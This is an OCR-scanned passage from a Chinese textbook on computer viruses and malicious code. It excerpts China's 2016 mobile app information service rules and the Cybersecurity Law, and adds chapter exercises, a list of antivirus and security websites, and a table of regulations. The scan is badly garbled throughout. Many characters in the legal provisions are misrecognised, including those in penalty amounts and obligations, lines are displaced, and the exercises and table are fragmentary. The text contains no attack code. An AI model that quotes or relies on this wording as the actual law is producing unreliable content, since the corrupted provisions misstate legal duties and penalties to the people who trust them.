第 三 条 ”国家 互联 网 信息 办 公 室 负责 
法 工作 。 地 方 互联 网 信息 办 公 室 依据 职责 
容 的 监督 管理 执法 工作 。 

第 四 条 鼓励 各 级 党 政 机 关 、 企 事业 单位 和 各 人 民团 体积 极 运用 移动 互联 网 应 用 程序 ， 
推进 政务 公开 ,提供 公共 服务 ,促进 经 济 社会 发 展 。 

第 五 条 通过 移动 互联 网 应 用 程序 提供 信息 服务 ,应当 依法 取得 法 律 法 规 规定 的 相关 
资质 。 从 事 互 联网 应 用 商店 服务 ,还 应 当 在 业务 上 线 运营 三 十 日 内 向 所 在 地 省 .自治 区 直 


全 国 移动 互联 网 应 用 程序 信息 内 容 的 监督 管理 执 
负责 本 行政 区 域内 的 移动 互联 网 应 用 程序 信息 内 
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辖 市 互联 网 信息 办 公 室 备案 。 

第 六 条 移动 互联 网 应 用 程序 提供 者 和 互联 网 应 用 商店 服务 提供 者 不 得 利用 移动 
互联 网 应 用 程序 从 事 危 害 国家 安全 ,扰乱 社会 秩序 \ 侵 犯 他 人 合法 权益 等 法 律 法 规 禁 
止 的 活动 ,不 得 利用 移动 互联 网 应 用 程序 制作 、 复 制 、 发 布 、 传 播 法 律 法 规 禁 止 的 信息 
内 容 。 

第 七 条 ”移动 互联 网 应 用 程序 提供 者 应 当 严 格 落实 信息 安全 管理 责任 ,依法 履行 以 下 
义务 : 

(一 ) 按照 “后 台 实 名 ,前 台 自 愿 ” 的 原则 ,对 注册 用 户 进 行 基 于 移动 电话 号 码 等 真实 身 
份 信息 认证 。 

(二 ) 建立 健全 用 户 信 息 安全 保护 机 制 ,收集 、 使 用 用 户 个 人 信息 应 当 遵 循 合 法 、 正 当 、 
必要 的 原则 ,明示 收集 使 用 信息 的 目的 .方式 和 范围 ,并 经 用 户 同 意 。 

(三 ) 建立 健全 信息 内 容 审核 管理 机 制 ,对 发 布 违法 违规 信息 内 容 的 , 视 情 采 取 警 示 、 限 
制 功能 、 和 暂停 更 新 .关闭 账号 等 处 置 措 施 ,保存 记录 并 加 有 关 主 管 部 门 报告 。 

(四 ) 依法 保障 用 户 在 安 婆 或 使 用 过 程 中 的 知情 权 和 选择 权 , 未 和 品 用 户 明示 并 经 用 户 同 
意 , 不 得 开启 收集 地 理 位 置 读 取 通 讯 录 , 使 用 摄像 头 、 启 用 录音 等 功能 ,不 得 开启 与 服务 无 
关 的 功能 ,不 得 拥 绑 安装 无 关 应 用 程序 。 

(五 ) 尊重 和 保护 知识 产权 ,不 得 制作 发布 侵犯 他 人 知识 产权 的 应 用 程序 。 

(六 ) 记录 用 户 日 志 信 息 ,并 保存 六 十 日 。 

第 八条 互联 网 应 用 商店 服务 提供 者 应 当 对 应 用 程序 提供 者 履行 以 下 管理 责任 : 

(一 ) 对 应 用 程序 提供 者 进行 真实 性 、 安 全 性 ,合法 性 等 审核 ,建立 信用 管理 制度 ,并 问 
所 在 地 省 、 自 治 区 、 直 辖 市 互联 网 信息 办 公 室 分 类 备案 。 

(二 ) 督促 应 用 程序 提供 者 保护 用 户 信息 ,完整 提供 应 用 程序 获取 和 使 用 用 户 信息 的 说 
明 , 并 向 用 户 呈 现 。 

(三 ) 督促 应 用 程序 提供 者 发 布 合法 信息 内 容 , 建 立 健 全 安全 审核 机 制 , 配 备 与 服务 规 
模 相 适应 的 专业 人 员 。 

(四 ) 督促 应 用 程序 提供 者 发 布 合 法 应 用 程序 ,尊重 和 保护 应 用 程序 提供 者 的 知识 
产权 。 

对 违反 前 款 规 定 的 应 用 程序 提供 者 , 视 情 采 取 警 示 、 暂 停 发 布下 加 应 用 程序 等 措施 , 保 
存 记 录 并 癌 有 关 主 管 部 门 报告 。 

第 九条 互联 网 应 用 商店 服务 提供 者 和 移动 互联 网 应 用 程序 提供 者 应 当 签 订 服 务 协 
议 ,明确 双方 权利 义务 ,共同 遵守 法 律 法 规 和 平台 公约 。 

第 十 条 ”移动 互联 网 应 用 程序 提供 者 和 互联 网 应 用 商店 服务 提供 者 应 当 配 合 有 关 部 门 
依法 进行 的 监督 检查 ,自觉 接受 社会 监督 ,设置 便捷 的 投诉 举报 入 口 ,及 时 人 处理 公众 投诉 
举报 。 

第 十 一 条 ”本 规定 自 2016 年 8 月 1 日 起 施行 。 

11. 中 华人 民 共 和 国 网 络 安 全 法 

2016 年 11 月 7 日 ,十 二 届 全 国人 大 常委 会 第 二 十 四 次 会 议 表 决 通过 《中 华人 民 共 和 国 
网 络 安全 法 (以 下 简称 《网 络 安全 法 》) ,并 于 2017 年 6 月 1 日 起 施行 。《 网 络 安全 法 ) 是 为 
保障 网 络 安 全 ,维护 网 络 空 间 主 权 和 国家 安全 、 社 会 公共 利益 ,保护 公民 、 法 人 和 其 他 组 织 的 
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合法 权益 ,促进 经 济 社会 信息 化 健康 发 展 制定 的 ,共有 7 章 79 条 ,具有 六 大 突出 亮点 。 一 是 
明确 网 络 空间 主权 的 原则 ; 二 是 明确 网 络 产品 和 服务 提供 者 的 安全 义务 ; 三 是 明确 网 络 运 
营 者 的 安全 义务 ; 四 是 进一步 完善 个 人 信息 保护 规则 ; 五 是 建立 关键 信息 基础 设施 安全 保 
护 制度 ; 六 是 确立 关键 信息 基础 设施 重要 数据 跨 境 传输 的 规则 。 

(2016 年 11 月 7 日 第 十 二 届 全 国人 民 代 表 大 会 常务 委员 会 第 二 十 四 次 会 议 通 过 ,日 
2017 年 6 月 1 日 起 施行 ) 

第 五 条 ”国家 采取 措施 ,监测 、 防 御 、 处 置 来 源 于 中 华人 民 共 和 国境 内 外 的 网 络 安全 风 
险 和 威胁 ,保护 关键 信息 基础 设施 免 受 攻击 、 侵 入 ,干扰 和 破坏 ,依法 惩治 网 络 违法 犯罪 活 
动 ,维护 网 络 空间 安全 和 秩序 。 

第 二 十 一 条 国家 实行 网 络 安全 等 级 保护 制度 。 网 络 运营 者 应 当 按 照 网 络 安全 等 级 保 
护 制 度 的 要 求 ,履行 下 列 安全 保护 义务 ,保障 网 络 免 受 干扰 、 破 坏 或 者 未 经 授权 的 访问 ,防止 
网 络 数据 泄露 或 者 被 历 取 、 贷 改 : 

(一 ) 制定 内 部 安全 管理 制度 和 操作 规程 ,确定 网 络 安全 负责 人 ,落实 网 络 安 全 保护 责任 ; 

(二 ) 采取 防范 计算 机 病毒 和 网 络 攻击 、 网 络 人 侵 等 危害 网 络 安 全 行为 的 技术 措施 ; 

(三 ) 采取 记录 、 跟 踪 网 络 运行 状态 ,监测 .记录 网 络 安全 事件 的 技术 措施 ,并 按照 规定 
留存 网 络 日 志 ; 

(四 ) 采取 数据 分 类 、 重 要 数据 备份 和 加 密 等 措施 ; 

(五 ) 法 律 .行政 法 规 规定 的 其 他 义务 。 

网 络 安全 等 级 保护 的 具体 办 法 由 国务 院 规 定 。 

第 二 十 二 条 ”网络 产品 .服务 应 当 符 合 相 关 国 家 标准 的 强制 性 要 求 。 网 络 产品 .服务 的 
提供 者 不 得 设置 恶意 程序 ; 发 现 其 网 络 产品 .服务 存在 安全 缺陷 .漏洞 等 风险 时 ,应 当 立 即 
采取 补救 措施 ,按照 规定 及 时 告知 用 户 并 向 有 关 主 管 部 门 报告 。 

第 二 十 五 条 网 络 运营 者 应 当 制 定 网 络 安全 事件 应 急 预 案 ,及 时 处 置 系统 漏洞 .计算 机 
病毒 、 网 络 攻 击 、 网 络 侵 入 等 安全 风险 ; 在 发 生 危 害 网 络 安全 的 事件 时 ,立即 启动 应 急 预 案 ， 
采取 相应 的 补救 措施 ,并 按照 规定 向 有 关 主 管 部 门 报告 。 

第 二 十 六 条 开展 网 络 安全 认证 检测、 风险 评估 等 活动 , 回 社 会 发 布 系统 漏洞 .计算 机 
病毒 、 网 络 攻 击 、 网 络 侵 入 等 网 络 安全 信息 ,应当 遵守 国家 有 关 规 定 。 

第 二 十 七 条 任何 个 人 和 组 织 不 得 从 事 非 法 侵入 他 人 网 络 .干扰 他 人 网 络 正 常 功 能 、 千 
取 网 络 数据 等 危害 网 络 安全 的 活动 ; 不 得 提供 专门 用 于 从 事 侵 入 网 络 .干扰 网 络 正 党 功能 
及 防护 措施 、 镭 取 网 络 数据 等 危害 网 络 安全 活动 的 程序 工具; 明知 他 人 从 事 危 害 网 络 安全 
活动 的 ,不 得 为 其 提供 技术 文 持 、 广 告 推广 、 文 付 结 算 等 帮助 。 

第 四 十 六 条 ”任何 个 人 和 组 织 应 当 对 其 使 用 网 络 的 行为 负责 ,不 得 设立 用 于 实施 诈骗 ， 
传授 犯罪 方法 ,制作 或 者 销售 违禁 物品 、 管 制 物品 等 违法 犯罪 活动 的 网 站 、 通 信和 群 组 ,不 得 利 
用 网 络 发 布 涉及 实施 诈骗 ,制作 或 者 销售 违禁 物品 、 管 制 物品 以 及 其 他 违法 犯罪 活动 的 
信息 

第 四 十 七 条 ”网 络 运营 者 应 当 加 强 对 其 用 户 发 布 的 信息 的 管理 ,发 现 法 律 \ 行 政法 规 禁 
止 发 布 或 者 传输 的 信息 的 ,应 当 立 即 停止 传输 该 信息 ,采取 消除 等 处 置 措 施 ,防止 信息 扩散 ， 
保存 有 关 记 录 , 并 加 有 关 主 管 部 门 报告 

第 四 十 八条 任何 个 人 和 组 织 发 送 的 电子 信息 、 提 供 的 应 用 软件 ,不 得 设置 恶意 程序 ， 
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不 得 含有 法 律 \ 行 政法 规 禁 止 发 布 或 者 传输 的 信息 。 

电子 信息 发 送 服务 提供 者 和 应 用 软件 下 载 服 务 提供 者 ,应当 履行 安全 管理 义务 ,知道 其 
用 户 有 前 球 规 定 行为 的 ,应 当 停 止 提供 服务 ,采取 消除 等 处 置 措施 ,保存 有 关 记 录 , 并 占有 关 
主管 部 门 报告 。 

第 四 十 九条 ”网 络 运 营 者 应 当 建 立 网 络 信 息 安全 投诉 、 举 报 制 度 ,公布 投诉 、 举 报 方式 
等 信息 ,及 时 受理 并 处 理 有 关 网 络 信息 安全 的 投诉 和 举报 。 

第 五 十 条 国家 网 信 部 门 和 有 关 部 门 依 法 履行 网 络 信息 安全 监督 管理 职责 ,发 现 法 律 、 
行政 法 规 禁止 发 布 或 者 传输 的 信息 的 ,应 当 要 求 网 络 运 营 者 停止 传输 ,采取 消除 等 处 置 措 
施 , 保 存 有 关 记 录 ; 对 来 源 于 中 华人 民 共 和 国境 外 的 上 述 信 息 , 应 当 通 知 有 关机 构 采 取 技 术 
措施 和 其 他 必要 措施 阻 断 传播 。 

第 六 十 二 条 违反 本 法 第 二 十 六 条 规定 ,开展 网 络 安全 认证 、 检 测 、 风险 评 估 等 活动 ,或 
者 问 社 会 发 布 系统 漏洞 .计算 机 病毒 .网 络 攻 击 、 网 络 侵入 等 网 络 安全 信息 的 ,由 有 关 主 管 部 
门 责令 改正 ,给 予 警 告 ; 拒 不 改正 或 者 情节 严重 的 ,处 一 万 元 以 上 十 万 元 以 下 罚款 ,并 可 以 
由 有 关 主 管 部 门 责令 暂停 相关 业务 、 停 业 整 顿 \ 关 闭 网 站 吊销 相关 业务 许可 证 或 者 吊销 营 
业 执 照 ,对 直接 负责 的 主管 人 员 和 其 他 直接 责任 人 员 处 五 千 元 以 上 五 万 元 以 下 罚款 。 

第 六 十 三 条 ”违反 本 法 第 二 十 七 条 规定 ,从 事 危 害 网 络 安全 的 活动 ,或 者 提供 专门 用 于 
从 事 危 害 网 络 安全 活动 的 程序 .工具 ,或 者 为 他 人 从 事 危 害 网 络 安全 的 活动 提供 技术 支持 、 
广告 推广 、 文 付 结 算 等 帮助 , 尚 不 构成 犯罪 的 ,由 公安 机 关 没 收 违法 所 得 ,处 五 日 以 下 拘留 ， 
可 以 并 处 五 万 元 以 上 五 十 万 元 以 下 罚球 ; 情节 较 重 的 ,处 五 日 以 上 十 五 日 以 下 拘留 ,可 以 并 
处 十 万 元 以 上 一 百 万 元 以 下 罚款 。 

单位 有 前 款 行为 的 ,由 公安 机 关 没 收 违法 所 得 ,处 十 万 元 以 上 一 百 万 元 以 下 罚款 ,并 对 
直接 负责 的 主管 人 员 和 其 他 直接 责任 人 员 依 照 前 款 规定 处 罚 。 

违反 本 法 第 二 十 七 条 规定 ,受到 治安 管理 处 罚 的 人 员 ,五 年 内 不 得 从 事 网 络 安全 管理 和 
网 络 运 营 关 键 岗 位 的 工作 ; 受到 刑事 处 罚 的 人 员 ,终身 不 得 从 事 网 络 安全 管理 和 网 络 运营 
关键 岗位 的 工作 。 

第 六 十 七 条 ”违反 本 法 第 四 十 六 条 规定 ,设立 用 于 实施 违法 犯罪 活动 的 网 站 、 通 信和 群 
组 ,或 者 利用 网 络 发 布 涉及 实施 违法 犯罪 活动 的 信息 , 尚 不 构成 犯罪 的 ,由 公安 机 关 处 五 日 
以 下 拘留 ,可 以 并 处 一 万 元 以 上 十 万 元 以 下 天 球 ; 情节 较 重 的 ,处 五 日 以 上 十 五 日 以 下 拘 
留 , 可 以 并 处 五 万 元 以 上 五 十 万 元 以 下 罚款 。 关 闭 用 于 实施 违法 犯罪 活动 的 网 站 、 通 信 
群 组 。 

单位 有 前 款 行为 的 ,由 公安 机 关 处 十 万 元 以 上 五 十 万 元 以 下 罚款 ,并 对 直接 负责 的 主管 
人 员 和 其 他 直接 责任 人 员 依 照 前 款 规定 处 罚 。 

第 六 十 八条 网 络 运营 者 违反 本 法 第 四 十 七 条 规定 ,对 法 律 .行政 法 规 禁 止 发 布 或 者 传 
输 的 信息 未 停止 传输 .采取 消除 等 处 置 措施 、 保 存 有 关 记 录 的 ,由 有 关 主 管 部 门 责令 改正 ,给 
予 警告 ,没收 违法 所 得 ; 拒 不 改正 或 者 情节 严重 的 ,处 十 万 元 以 上 五 十 万 元 以 下 罚款 ,并 可 
以 责令 暂停 相关 业务 、 停业 整顿 ,关闭 网 站 .吊销 相关 业务 许可 证 或 者 吊销 营业 执照 ,对 直接 
负责 的 主管 人 员 和 其 他 直接 责任 人 员 处 一 万 元 以 上 十 万 元 以 下 罚款 。 

电子 信息 发 送 服务 提供 者 .应 用 软件 下 载 服务 提供 者 ,不 履行 本 法 第 四 十 八条 第 二 款 规 
定 的 安全 管理 义务 的 ,依照 前 球 规 定 处 罚 。 
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第 七 十 一 条 有 本 法 规定 的 违法 行为 的 ,依照 有 关 法 律 .行政 法 规 的 规定 记 入 信用 档 
案 ,并 予以 公示 。 


12.8 习 是 


一 、 填空 题 
1. 从 恶意 代码 对 抗 的 角度 来 看 ,病毒 防治 策略 必须 具备 下 列 准则 : 
和 蔡 代 操 作 。 
村 ;十 二 届 全 国人 大 常委 会 第 二 十 四 次 会 议 表决 通过 《中 华人 民 共 和 国 
网 络 安全 法 》, 并 于 起 施行 。 
二 、 选 择 题 


下 列 ( ) 是 不 正确 的 。 

不 存在 能 够 防治 未 来 所 有 病毒 的 反 病 毒 软 、 硬 件 

现在 的 杀毒 软件 能 够 查 杀 未 知 病毒 

恶意 代码 产生 在 前 ,安全 手段 相对 沛 后 

数据 备份 是 防治 数据 丢失 的 重要 手段 

、 思 考题 

. 结合 本 书 所 学 知识 , 谈 谈 对 "不 存在 能 够 防治 未 来 所 有 病毒 的 反 病 毒 软 、 便 件 这 人 名 
tale 

. 论述 计算 机 病毒 防治 策略 在 防范 计算 机 病毒 中 的 作用 。 

3. 结合 实例 (历史 或 身边 ) , 谈 谈 对 违反 信息 安全 法 律 法 规 的 一 些 认 识 
4. 试 讨论 如 何 才能 够 真正 地 做 到 防范 未 来 计算 机 病毒 人 侵 或 破坏 。 
Cl ee 份 企业 病毒 防范 策略 需要 考虑 哪些 步骤 ? 

、 实 操 题 

结合 12. 4.4 节 的 内 容 , 熟 悉 其 中 一 种 恶意 代码 “额外 防范 工具 ”。 


a 


Il 


附 孙 A， 计 虹 机 病毒 相关 网 上 资源 


1. WildList 国际 组 织 

http://www. wildlist. org 

该 网 站 的 内 容 为 在 世界 各 地 发 现 的 病毒 列表 。 负 责 维 护 这 个 列表 ,并 且 按 月 打包 供用 
户 下 载 。 此 外 ,网 站 上 还 有 一 些 计算 机 病毒 方面 的 学 术 论 文 。 

2. 病毒 公告 

http://www. virusbtn. com 

对 于 任何 关心 恶意 代码 和 垃圾 信息 防护 、 检 测 和 清除 的 人 来 说 ,病毒 公告 在 线 杂 志 是 一 
个 必 不 可 少 的 参考 。 病 毒 公告 牌 逐 日 逐 月 地 提供 如 下 信息 。 

(1) 来 自 于 反 恶 意 代码 业界 的 发 人 深 省 的 新 闻 和 观点 。 

(2) 最 新 恶意 代码 威胁 的 详细 分 析 。 

(3) 探索 反 恶 意 代 码 技术 开发 的 长 篇 文档 。 

(4) 反 恶 意 代码 专家 的 会 见 。 

(5) 对 当前 反 病 毒 产品 的 独立 评测 。 

(6) 覆盖 垃圾 邮件 和 反 垃 圾 邮件 技术 的 月 报 。 

3. 卡 饭 论坛 

http://bbs. kafan. cn 

卡 饭 的 意思 是 卡巴 斯 基 的 FANS( 爱 好 者 ) , 取 其 谐音 , 即 为 卡 饭 。 卡 饭 论 坛 最 初 是 一 个 
以 卡巴 斯 基 爱 好 者 为 主体 ,以 计算 机 安全 软件 为 主要 内 容 的 论坛 。 随 着 国产 计算 机 安全 软 
件 的 兴起 , 卡 饭 论坛 对 主流 的 计算 机 安全 软件 均 有 不 同 程度 的 涉及 ,迄今 为 止 已 发 展 成 为 最 
大 的 计算 机 安全 论坛 之 一 。 论 坛 的 开放 时 间 是 2006 年 6 月 1 日 。 

4. 亚洲 反 病 毒 研 究 者 协会 (AVAR) 

http://www. aavar. org 

AVAR( 亚 洲 反 病毒 研究 者 协会 ) 成 立 于 1998 年 6 月 。 协 会 的 宗旨 是 预防 计算 机 病毒 
的 传播 和 破坏 ,促进 亚洲 的 反 病 毒 研究 者 间 建 立 良 好 的 合作 关系 。 该 协会 是 独立 的 、 非 营利 
性 组 织 ,主要 面向 的 对 象 是 亚太 地 区 。 本 协会 有 来 自 澳大利亚、 中 国 、. 印 度 日本、 韩国 、 菲 律 
宾 、 新 加 坡 、 英 国美 国 等 国家 的 资深 反 病 毒 专家 。 其 独立 性 保证 了 能 在 对 抗 计 算 机 病毒 的 
过 程 中 发 挥 重 要 的 作用 ,同时 提醒 人 们 对 计算 机 安全 的 获 惕 性 。AVAR 的 主要 工作 如 下 。 

(1) 组 织 和 承办 以 反 病 毒 为 主题 的 AVAR 年 会 和 论坛 。 

(2) 在 AVAR 网 站 上 提供 亚洲 的 计算 机 病毒 事件 的 信息 。 

(3) 通过 邮件 的 形式 在 AVAR 的 成 员 中 建立 邮件 列表 ,并 在 会 员 中 交换 意见 与 信息 。 

5. 国家 计算 机 病毒 应 急 处 理 中 心 


http://www. antivirus-china. org. cn 


340 计算 机 病毒 与 恶意 代码 一 一 原理 、 技 术 及 防范 (第 4 版 ) 


该 网 站 主要 内 容 包括 病毒 流行 列表 病毒 SOS 求救 和 数据 恢复 等 。 

6. 病毒 观察 

http://www. virusview. net 

该 网 站 主要 内 容 包 括 病 毒 预 报 、 新 闻 评论、 相关 法 规 、 反 病毒 资料 、 安 全 汤 洞 .密码 知识 
和 病毒 百科 在 线 检索 等 。 

7. HACKS80 

www. hack80. com 

HACK80 是 集 黑 客 技术 交流 .黑客 工具 分 享 的 黑客 论坛 。 与 传统 黑客 联盟 不 同 , 该 论 
坛 在 守法 的 前 提 下 提倡 日 由 的 技术 交流 ,力求 成 为 一 个 气氛 优秀 的 技术 圈子 。 

8. 安全 焦点 

http://www. xfocus. net 

安全 焦点 是 中 国 目 前 顶级 的 网 络 安全 站 点 ,那里 集聚 的 一 大 批 知 名 的 黑客 。 网 站 内 容 
包括 安全 论文 、 安 全 工具 、 安 全 漏洞 及 逆 回 技术 等 。 

9. 看 雪 论 坛 

https: //bbs. pediy. com/ 

看 雪 论 坛 是 致力 于 PC、 移 动物 联网 安全 人 研究 及 逆 回 工程 相关 的 开发 者 社区 。 网 站 主 
要 内 容 包 括 黑 客 频道 、 防 毒 技 巧 \、 网 络 安 全 新 闻 和 病毒 新 闻 等 。 

10. 国际 计算 机 安全 联合 会 (International Computer Secwrity Association ,ICSA) 

http://www. icsa. com/ 

如 果 对 Internet 的 安全 问题 感 兴趣 ,可 以 访问 国家 计算 机 安全 联合 会 (NCSA) 的 站 点 。 
这 里 会 看 到 很 多 关于 国家 计算 机 安全 联合 会 各 种 活动 的 信息 ,包括 会 议 、 培 训 、 产 品 认证 和 
安全 警告 等 ,可 以 了 解 到 国际 知名 的 病毒 防治 软件 登记 情况 。 


附录 B 相关 法 律 法 规 


中 国信 息 安全 部 分 法 规 概览 表 
法 规 名 称 发 布 机 构 
中 华人 民 共 和 国 计 算 机 信息 系统 安全 保护 条 例 国务 院 
中 国 公 用 计算 机 互联 网 国际 联网 管理 办 法 邮电 部 
计算 机 信息 网 络 国际 联网 出 入 口 信道 管理 办 法 邮电 部 
中 华人 民 共 和 国 计 算 机 信息 网 络 国 际 联网 管理 暂 


行规 定 ree 
计算 机 信息 系统 安全 专用 产品 检测 和 销售 许可 证 | ，、,， 
管理 办 法 om 
计算 机 信息 网 络 国际 联网 安全 保护 管理 办 法 公安 部 
pt > 
商用 密码 管理 条 例 国务 院 
计算 机 病毒 防治 管理 办 法 公安 部 
We 
互联 网 信息 服务 管理 办 法 国务 院 
计算 机 信息 系统 国际 联网 保密 管理 规定 

言 息 产 业 部 、 公 安 部 、 文 化 部 、 国 
互联 网 上 网 服务 营业 场所 管理 办 法 tne ” 
计算 机 软件 保护 条 例 国务 院 
互联 网 上 网 服务 营业 场所 管理 条 例 国务 院 
中 华人 民 共和 国电 子 签名 法 
互联 网 安全 保护 技术 措施 规定 
信息 网 络 传播 权 保护 条 例 国务 院 

公安 部 .国家 保密 局 、 国 家 密码 
mn op 
电子 认证 服务 密码 管理 办 法 
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续 表 
全 国人 民 代 表 大 会 常务 委员 会 关于 加 强 网 络 信息 
移动 互联 网 应 用 程序 信息 服务 管理 规定 2016 
中 华人 民 共 和 国 网 络 安全 法 2016 
网 络 产品 和 服务 安全 审查 办 法 (试行 ) 2017 
互联 网 信息 内 容 管理 行政 执法 程序 规定 2017 
互联 网 新 闻 信 息 服务 管理 规定 2017 
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